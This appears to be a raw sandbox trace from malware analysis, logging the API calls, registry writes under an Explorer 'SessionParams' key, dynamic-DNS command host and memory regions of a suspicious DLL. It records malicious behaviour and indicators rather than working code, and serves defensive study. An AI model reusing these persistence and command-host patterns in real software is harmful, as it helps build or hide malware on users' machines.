wsprintfA (in: param_1=0x1ef1b8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.578] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.578] wsprintfA (in: param_1=0x1ef0b4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.578] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.578] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.578] CloseHandle (hObject=0x74) returned 1 [0033.578] GetLastError () returned 0x0 [0033.578] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.578] GetLastError () returned 0x0 [0033.578] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.579] GetSystemDirectoryA (in: lpBuffer=0x1ef1b8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.579] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.579] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.579] CloseHandle (hObject=0x74) returned 1 [0033.579] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.579] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.579] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.580] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.580] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.580] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.581] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.581] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.581] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.581] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.581] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.581] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.582] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.582] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.582] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.583] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.583] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.583] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.583] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.584] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.584] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.584] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.584] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.584] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.584] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.584] AddAtomT () returned 0x0 [0033.584] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1ef6ec, lpdwDisposition=0x1ef6f0 | out: phkResult=0x1ef6ec*=0x78, lpdwDisposition=0x1ef6f0*=0x2) returned 0x0 [0033.584] CloseHandle (hObject=0x78) returned 1 [0033.584] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0033.584] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1ef738, lpdwDisposition=0x1ef7f0 | out: phkResult=0x1ef738*=0x7c, lpdwDisposition=0x1ef7f0*=0x2) returned 0x0 [0033.584] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1ed94, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.584] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1ed98, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1ed9c, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1eda4, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1eda8, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1edb8, lpcbData=0x1ef734*=0x8 | out: lpType=0x1ef73c*=0x3, lpData=0x72f1edb8*, lpcbData=0x1ef734*=0x8) returned 0x0 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1edc0, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x1ef734*=0x4) returned 0x0 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1edc4, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1edc8, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x1ef734*=0x4) returned 0x0 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1edcc, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x1ef734*=0x4) returned 0x0 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1edd0, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x1ef734*=0x4) returned 0x0 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1eddc, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x1ef73c, lpData=0x1370b28, lpcbData=0x1ef734*=0x200 | out: lpType=0x1ef73c*=0x0, lpData=0x1370b28*=0x0, lpcbData=0x1ef734*=0x200) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1eef0, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x1ef73c, lpData=0x1370d30, lpcbData=0x1ef734*=0x64 | out: lpType=0x1ef73c*=0x3, lpData=0x1370d30*, lpcbData=0x1ef734*=0x2) returned 0x0 [0033.585] lstrlenA (lpString=" ") returned 1 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1edec, lpcbData=0x1ef734*=0x104 | out: lpType=0x1ef73c*=0x3, lpData=0x72f1edec*, lpcbData=0x1ef734*=0x0) returned 0x0 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1eef4, lpcbData=0x1ef734*=0x8 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x1ef734*=0x8) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1eefc, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1ef00, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x1ef73c, lpData=0x72f1eda0, lpcbData=0x1ef734*=0x4 | out: lpType=0x1ef73c*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x1ef734*=0x4) returned 0x2 [0033.585] RegCloseKey (hKey=0x7c) returned 0x0 [0033.586] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef7f8 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef7f8*=0x2) returned 0x0 [0033.586] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0033.586] GetLastError () returned 0x0 [0033.586] RegCloseKey (hKey=0x7c) returned 0x0 [0033.586] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef808 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef808*=0x2) returned 0x0 [0033.586] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0033.586] RegCloseKey (hKey=0x7c) returned 0x0 [0033.586] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef7f8 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef7f8*=0x2) returned 0x0 [0033.586] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0033.586] RegCloseKey (hKey=0x7c) returned 0x0 [0033.587] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef7f4 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef7f4*=0x2) returned 0x0 [0033.587] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0033.587] RegCloseKey (hKey=0x7c) returned 0x0 [0033.587] GetLastError () returned 0x0 [0033.587] GetLastError () returned 0x0 [0033.587] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0033.587] lstrlenA (lpString="00") returned 2 [0033.587] lstrlenA (lpString="/00/") returned 4 [0033.587] wsprintfA (in: param_1=0x1370da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0033.587] wsprintfA (in: param_1=0x1370dc8, param_2="%s" | out: param_1="00") returned 2 [0033.587] wsprintfA (in: param_1=0x13726f0, param_2="%s" | out: param_1="/00/") returned 4 [0033.587] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0033.587] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0033.587] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef7f4 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef7f4*=0x2) returned 0x0 [0033.587] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x1370d30*, cbData=0x64 | out: lpData=0x1370d30*) returned 0x0 [0033.587] RegCloseKey (hKey=0x7c) returned 0x0 [0033.589] HeapDestroy (hHeap=0x1370000) returned 1 Process: id = "36" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1640 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1641 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1642 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1643 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1644 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1645 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1646 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1647 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1648 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1649 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1650 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1651 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1652 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1653 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1654 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1655 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1656 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1657 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1658 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1659 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1660 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1661 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1662 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1663 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1664 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1665 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1666 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1667 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1668 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1669 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1670 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1671 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1672 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1673 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1674 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1675 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1676 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1677 start_va = 0x5e0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1678 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1679 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1680 start_va = 0xd0000 